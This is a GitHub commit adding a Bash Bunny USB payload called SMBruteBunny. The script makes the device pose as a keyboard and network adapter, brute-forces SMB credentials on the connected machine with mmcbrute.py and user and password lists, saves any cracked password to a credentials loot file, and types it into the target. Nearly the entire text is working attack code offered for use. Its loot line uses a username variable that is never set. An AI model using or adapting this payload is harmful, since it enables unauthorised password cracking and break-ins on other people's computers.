Create payload.txt

pull/383/head
Mohamed A. Baset 2019-05-30 00:50:08 -05:00 committed by GitHub
parent fcb15af701
commit 0973bf25ec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
#!/bin/bash
#
# Title: SMBruteBunny
# Author: Mohamed A. Baset (@SymbianSyMoh)
# PS: This is the shittiest bash script you'll ever see :D
password_process_file="$ORIGINAL_SWITCH/ppf.txt"
password_to_quack="$ORIGINAL_SWITCH/p2q.txt"
password_loot_file="$ORIGINAL_SWITCH/credentials.txt"
user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt"
pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt"
# Setup
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET
mount /dev/nandf /root/udisk/
GET TARGET_IP
GET TARGET_HOSTNAME
# Perform SMB bruteforce attack
LED STAGE1
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
# Check for results
LED STAGE2
if grep -q "Success" $password_process_file; then
LED G
# Extract and Store the loot, then quack it
pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file
echo "$pass" > $password_to_quack
QUACK $password_to_quack
QUACK ENTER
rm $password_to_quack 2> /dev/null
else
LED FAIL
fi
LED CLEANUP
sync; sleep 1; sync
LED FINISH